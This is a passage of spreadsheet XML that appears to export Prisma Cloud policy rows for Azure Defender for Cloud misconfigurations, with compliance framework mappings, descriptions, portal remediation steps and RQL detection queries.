          <t>PC-AZR-SC-883</t>
        </is>
      </c>
      <c r="AD2389" t="b">
        <v>1</v>
      </c>
      <c r="AE2389" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2389" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2389" t="inlineStr">
        <is>
          <t>ADAM TEST EXEMPT LIST - Notifications:, AccountGroups:PCS GCP Accounts;, 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NH-test - Notifications:jira, AccountGroups:avega-active-directory,Default Account Group,loblaw-ag,Pramm-XSIAM,Test_Praveen_Webinar2,jojo-test,jleech-cloud-labs,undukwo_Account,Juan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89" t="inlineStr">
        <is>
          <t>028a45a7-ad8d-48f3-9012-2417defd324b</t>
        </is>
      </c>
      <c r="AI2389" t="inlineStr">
        <is>
          <t>e210f1d9-abce-4387-bc84-36b065ee0b21</t>
        </is>
      </c>
      <c r="AJ2389" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2389" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2390">
      <c r="A2390" t="inlineStr"/>
      <c r="B2390" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2390" s="2" t="inlineStr"/>
      <c r="D2390" t="inlineStr"/>
      <c r="E2390" t="inlineStr"/>
      <c r="F2390" t="inlineStr"/>
      <c r="G2390" t="b">
        <v>1</v>
      </c>
      <c r="H23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90" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2390" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2390" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud set to Off for File Integrity Monitoring</t>
        </is>
      </c>
      <c r="L2390" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2390" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2390" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2390" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2390" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2390" t="inlineStr"/>
      <c r="R2390" t="inlineStr"/>
      <c r="S2390" t="inlineStr"/>
      <c r="T2390" t="b">
        <v>0</v>
      </c>
      <c r="U2390" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2390" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2390" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud where the File Integrity Monitoring is set to Off.
File Integrity Monitoring tracks critical system files in Windows and Linux for unauthorized changes, helping to identify potential attacks. Disabling File Integrity Monitoring leaves your system vulnerable to unnoticed alterations, increasing the risk of data breaches or system failures. Enabling FIM enhances security by alerting you to suspicious changes, allowing for proactive threat detection and prevention of unauthorized modifications to system files.
As a security best practice, it is recommended to enable File Integrity Monitoring in Azure Microsoft Defender for Cloud.</t>
        </is>
      </c>
      <c r="X2390" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to 'Microsoft Defender for Cloud'
3. Under 'Management', select 'Environment Settings'
4. Click on the subscription name
5. Select the 'Defender plans'
6. Click on 'Settings &amp; monitoring' at the top
7. In the table, find 'File Integrity Monitoring' and select 'On' under Plan
8. Click 'Continue' in the top left
9. Click 'Save'</t>
        </is>
      </c>
      <c r="Y2390" t="inlineStr"/>
      <c r="Z2390" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = not (pricings[?any(properties.extensions[?any(name equal ignore case FileIntegrityMonitoring AND isEnabled is true)] exists AND properties.pricingTier equal ignore case Standard )] exists)</t>
        </is>
      </c>
      <c r="AA2390" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2390" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2390" t="inlineStr">
        <is>
          <t>PC-AZR-SC-1314</t>
        </is>
      </c>
      <c r="AD2390" t="b">
        <v>1</v>
      </c>
      <c r="AE2390" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2390" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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90" t="inlineStr">
        <is>
          <t>fdde6a0e-bef2-47cb-9086-9bebb589d151</t>
        </is>
      </c>
      <c r="AI2390" t="inlineStr">
        <is>
          <t>80025ae3-9f59-447c-a895-e7f866bdc923</t>
        </is>
      </c>
      <c r="AJ2390" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2390" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2391">
      <c r="A2391" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, CIS v2.0.0 (Azure) Level 2, CIS v2.0.0 (Azure) Level 2, CIS v2.1.0 (Azure) Level 2, CIS v2.1.0 (Azure) Level 2, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2022.2.1, Insurance Regulatory And Development Authority Of India, kashan ACSC Information Security Manual (ISM), Copy of New Zealand Information Security Manual (NZISM v3.4), ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of ACSC Information Security Manual (ISM)-clone, New Zealand Information Security Manual (NZISM v3.4), CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), CIS Controls v7.1, MLPS 2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2391" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2391" s="2" t="inlineStr"/>
      <c r="D2391" t="inlineStr"/>
      <c r="E2391" t="inlineStr"/>
      <c r="F2391" t="inlineStr"/>
      <c r="G2391" t="b">
        <v>0</v>
      </c>
      <c r="H23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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2391" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2391" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud set to Off for Containers</t>
        </is>
      </c>
      <c r="L2391" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2391" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2391" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2391" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2391" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2391" t="inlineStr">
        <is>
          <t>Guidelines for Outsourcing</t>
        </is>
      </c>
      <c r="R2391" t="inlineStr">
        <is>
          <t>ISM-1570</t>
        </is>
      </c>
      <c r="S2391" t="inlineStr"/>
      <c r="T2391" t="b">
        <v>0</v>
      </c>
      <c r="U2391" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2391" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2391" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud which has defender setting for Containers set to Off. Enabling Azure Defender provides advanced security capabilities like providing threat intelligence, anomaly detection, and behavior analytics in the Azure Microsoft Defender for Cloud. It is highly recommended to enable Azure Defender for Containers.</t>
        </is>
      </c>
      <c r="X2391"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'Containers' Select 'On' under Plan.
8. Select 'Save'</t>
        </is>
      </c>
      <c r="Y2391" t="inlineStr"/>
      <c r="Z2391" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any(name equals Containers and properties.pricingTier does not equal Standard)] exists</t>
        </is>
      </c>
      <c r="AA2391" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2391" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2391" t="inlineStr">
        <is>
          <t>PC-AZR-SC-860</t>
        </is>
      </c>
      <c r="AD2391" t="b">
        <v>1</v>
      </c>
      <c r="AE2391" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2391" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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1" t="inlineStr">
        <is>
          <t>6841aa18-976c-44cf-a77a-3b10443900ae</t>
        </is>
      </c>
      <c r="AI2391" t="inlineStr">
        <is>
          <t>b33a7650-cc5d-4923-9ad1-8cfde2ce669c</t>
        </is>
      </c>
      <c r="AJ2391" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2391" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2392">
      <c r="A2392" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, kfirdaus AWS Account-CS, CIS v1.3.0 (Azure), NIST SP 800-172, CIS v2.1.0 (Azure) Level 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Azure Security Benchmark (v3), CIS v1.4.0 (Azure), MLPS 2.0 (Level 2), CIS v1.2.0 (Azure), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, CIS v1.3.1 (Azure), NIST CSF, Copy of CIS v1.2.0 (Azure), Copy of Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Insurance Regulatory And Development Authority Of India, ISO/IEC 27002:2013, CIS v2.0.0 (Azure) Level 2, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Azure Security Benchmark (v3), CSA CCM v.4.0.1, ISO/IEC 27002:2013, Copy of New Zealand Information Security Manual (NZISM v3.4), ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], Azure Security Benchmark (v2), Copy of ACSC Information Security Manual (ISM)-clone, New Zealand Information Security Manual (NZISM v3.4), MTSBv2_Azure, CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, ISO/IEC 27018:2019, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2392" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2392" s="2" t="inlineStr"/>
      <c r="D2392" t="inlineStr"/>
      <c r="E2392" t="inlineStr"/>
      <c r="F2392" t="inlineStr"/>
      <c r="G2392" t="b">
        <v>0</v>
      </c>
      <c r="H23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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2392" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2392" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud MCAS integration Disabled</t>
        </is>
      </c>
      <c r="L2392" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2392" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2392" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2392" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2392" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2392" t="inlineStr">
        <is>
          <t>Security Center</t>
        </is>
      </c>
      <c r="R2392" t="inlineStr">
        <is>
          <t>2.10</t>
        </is>
      </c>
      <c r="S2392" t="inlineStr"/>
      <c r="T2392" t="b">
        <v>0</v>
      </c>
      <c r="U2392" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2392" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2392" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) which has Microsoft Defender for Cloud Apps (MCAS) integration disabled. Enabling Microsoft Defender for Cloud provides the tools needed to harden your resources, track your security posture, protect against cyberattacks, and streamline security management. It is highly recommended to enable Microsoft Defender for MCAS.</t>
        </is>
      </c>
      <c r="X2392" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Click on the subscription name
5. Select the 'Integrations'
6. Check/Enable option 'Allow Microsoft Defender for Cloud Apps to access my data'
7. Select 'Save'</t>
        </is>
      </c>
      <c r="Y2392" t="inlineStr"/>
      <c r="Z2392" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = settings[?any( name equals MCAS and properties.enabled is false )] exists</t>
        </is>
      </c>
      <c r="AA2392" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2392" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2392" t="inlineStr">
        <is>
          <t>PC-AZR-SC-661</t>
        </is>
      </c>
      <c r="AD2392" t="b">
        <v>1</v>
      </c>
      <c r="AE2392" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2392" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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2" t="inlineStr">
        <is>
          <t>470796d2-3ed6-40a3-b26a-e882afce4090</t>
        </is>
      </c>
      <c r="AI2392" t="inlineStr">
        <is>
          <t>303a5cc7-cedd-4cb6-ae9f-4975c6d38a11</t>
        </is>
      </c>
      <c r="AJ2392" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2392" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2393">
      <c r="A2393" t="inlineStr">
        <is>
          <t>CIS v2.0.0 (Azure) Level 2, CIS v1.5.0 (Azure) - Level 2, Insurance Regulatory And Development Authority Of India, CIS v2.1.0 (Azure) Level 2</t>
        </is>
      </c>
      <c r="B2393" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2393" s="2" t="inlineStr"/>
      <c r="D2393" t="inlineStr"/>
      <c r="E2393" t="inlineStr"/>
      <c r="F2393" t="inlineStr"/>
      <c r="G2393" t="b">
        <v>1</v>
      </c>
      <c r="H23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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2393" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2393" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud set to Off for Cosmos DB</t>
        </is>
      </c>
      <c r="L2393" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2393" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2393" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2393" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2393" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2393" t="inlineStr">
        <is>
          <t>Microsoft Defender</t>
        </is>
      </c>
      <c r="R2393" t="inlineStr">
        <is>
          <t>2.1.6</t>
        </is>
      </c>
      <c r="S2393" t="inlineStr"/>
      <c r="T2393" t="b">
        <v>0</v>
      </c>
      <c r="U2393" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2393" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2393" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud which has defender setting for Cosmos DB set to Off. Enabling Azure Defender for the cloud provides advanced security capabilities like threat intelligence, anomaly detection, and behaviour analytics. Microsoft Defender for Azure Cosmos DB detects potential SQL injections, known bad actors based on Microsoft Threat Intelligence, suspicious access patterns, and potential exploitation of your database through compromised identities, or malicious insiders. It is highly recommended to enable Azure Defender for Cosmos DB.</t>
        </is>
      </c>
      <c r="X2393" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Click on the subscription name
5. Select the 'Defender plans'
6. Click 'Select types &gt;' in the row for 'Databases'
7. Set the radio button next to 'Azure Cosmos DB' to 'On'
8. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2393" t="inlineStr"/>
      <c r="Z2393" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any(name equals CosmosDbs and properties.pricingTier does not equal Standard)] exists</t>
        </is>
      </c>
      <c r="AA2393" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2393" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2393" t="inlineStr">
        <is>
          <t>PC-AZR-SC-1107</t>
        </is>
      </c>
      <c r="AD2393" t="b">
        <v>1</v>
      </c>
      <c r="AE2393" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2393" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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3" t="inlineStr">
        <is>
          <t>538b09ff-4206-45da-9ccd-53a2233257cd</t>
        </is>
      </c>
      <c r="AI2393" t="inlineStr">
        <is>
          <t>e7fc323e-a760-40b9-bdf9-6665962a32c3</t>
        </is>
      </c>
      <c r="AJ2393" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2393" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2394">
      <c r="A2394" t="inlineStr">
        <is>
          <t>ISO 27001:2013, ISO/IEC 27017:2015, CIS v1.1 (Azure), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, kfirdaus AWS Account-CS, Insurance Regulatory And Development Authority Of India, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, testazure, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, ISO/IEC 27017:2015, Copy of CIS Controls v8, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, ISO 27001:2013, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), HITRUST v.9.4.2 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2394" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2394" s="2" t="inlineStr"/>
      <c r="D2394" t="inlineStr"/>
      <c r="E2394" t="inlineStr"/>
      <c r="F2394" t="inlineStr"/>
      <c r="G2394" t="b">
        <v>1</v>
      </c>
      <c r="H23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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2394" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2394" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud Defender plans is set to Off</t>
        </is>
      </c>
      <c r="L2394" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2394" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2394" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2394" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2394" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2394" t="inlineStr">
        <is>
          <t>Guidelines for Outsourcing</t>
        </is>
      </c>
      <c r="R2394" t="inlineStr">
        <is>
          <t>ISM-1570</t>
        </is>
      </c>
      <c r="S2394" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2394" t="b">
        <v>0</v>
      </c>
      <c r="U2394" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2394" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2394" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud which has a Defender setting set to Off. Enabling Azure Defender provides advanced security capabilities like providing threat intelligence, anomaly detection, and behavior analytics in the Azure Microsoft Defender for Cloud. It is highly recommended to enable Azure Defender for all Azure services.</t>
        </is>
      </c>
      <c r="X2394"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'Select Defender plan by resource type' Select 'Enable all'.
8. Select 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-standard-pricing-tier-is-selected
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-standard-pricing-tier-is-selected</t>
        </is>
      </c>
      <c r="Y2394" t="inlineStr"/>
      <c r="Z2394" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any(properties.pricingTier does not equal Standard and (properties.deprecated does not exist or properties.deprecated is false))] exists
{"category":"General","resourceTypes":["azurerm_security_center_subscription_pricing"]}</t>
        </is>
      </c>
      <c r="AA2394" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2394" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2394" t="inlineStr">
        <is>
          <t>PC-AZR-SC-127-CKV_AZURE_19</t>
        </is>
      </c>
      <c r="AD2394" t="b">
        <v>1</v>
      </c>
      <c r="AE2394" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2394" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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4" t="inlineStr">
        <is>
          <t>c221ce81-99df-487e-8c05-4329335e9f9a</t>
        </is>
      </c>
      <c r="AI2394" t="inlineStr">
        <is>
          <t>6b6fb5a5-38be-4dfd-bf0c-c417418ae388</t>
        </is>
      </c>
      <c r="AJ2394" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2394" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2395">
      <c r="A2395" t="inlineStr">
        <is>
          <t>CIS v2.1.0 (Azure) Level 2, Insurance Regulatory And Development Authority Of India, CIS v2.0.0 (Azure) Level 2, CIS v1.5.0 (Azure) - Level 2</t>
        </is>
      </c>
      <c r="B2395" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2395" s="2" t="inlineStr"/>
      <c r="D2395" t="inlineStr"/>
      <c r="E2395" t="inlineStr"/>
      <c r="F2395" t="inlineStr"/>
      <c r="G2395" t="b">
        <v>1</v>
      </c>
      <c r="H23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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2395" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2395" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud set to Off for Open-Source Relational Databases</t>
        </is>
      </c>
      <c r="L2395" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2395" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2395" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2395" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2395" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2395" t="inlineStr">
        <is>
          <t>Microsoft Defender for Cloud</t>
        </is>
      </c>
      <c r="R2395" t="inlineStr">
        <is>
          <t>2.1.6</t>
        </is>
      </c>
      <c r="S2395" t="inlineStr"/>
      <c r="T2395" t="b">
        <v>0</v>
      </c>
      <c r="U2395" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2395" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2395" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud which has defender setting for Open-Source Relational Databases set to Off. Enabling Azure Defender for cloud provides advanced security capabilities like threat intelligence, anomaly detection, and behaviour analytics. Microsoft Defender for Cloud detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases. It is highly recommended to enable Azure Defender for Open-Source Relational Databases.</t>
        </is>
      </c>
      <c r="X2395" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Click on the subscription name
5. Select the 'Defender plans'
6. Click 'Select types &gt;' in the row for 'Databases'
7. Set the radio button next to 'Open-source relational databases' to 'On'
8. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2395" t="inlineStr"/>
      <c r="Z2395" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any(name equals OpenSourceRelationalDatabases and properties.pricingTier does not equal Standard)] exists</t>
        </is>
      </c>
      <c r="AA2395" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2395" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2395" t="inlineStr">
        <is>
          <t>PC-AZR-SC-1106</t>
        </is>
      </c>
      <c r="AD2395" t="b">
        <v>1</v>
      </c>
      <c r="AE2395" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2395" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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5" t="inlineStr">
        <is>
          <t>0252781c-a551-4304-ad80-b60fadb3e51e</t>
        </is>
      </c>
      <c r="AI2395" t="inlineStr">
        <is>
          <t>9305a6ac-a5d9-4170-8b03-0b0de82dc4b9</t>
        </is>
      </c>
      <c r="AJ2395" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2395" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2396">
      <c r="A2396" t="inlineStr">
        <is>
          <t>CIS v1.2.0 (Azure), ISO/IEC 27017:2015, kfirdaus AWS Account-CS, Copy of CIS v1.2.0 (Azure), NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS v1.3.1 (Azure), CIS v1.5.0 (Azure) - Level 2, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Azure Security Benchmark (v3), MLPS 2.0 (Level 2), CIS v1.3.0 (Azure), Secure Controls Framework (SCF) - 2024.2, CIS v2.0.0 (Azure) Level 2, CIS Controls v8, NIST CSF, Copy of Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, CIS v1.4.0 (Azure), Insurance Regulatory And Development Authority Of India, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Azure Security Benchmark (v3), CSA CCM v.4.0.1, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), HITRUST v.9.4.2 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls 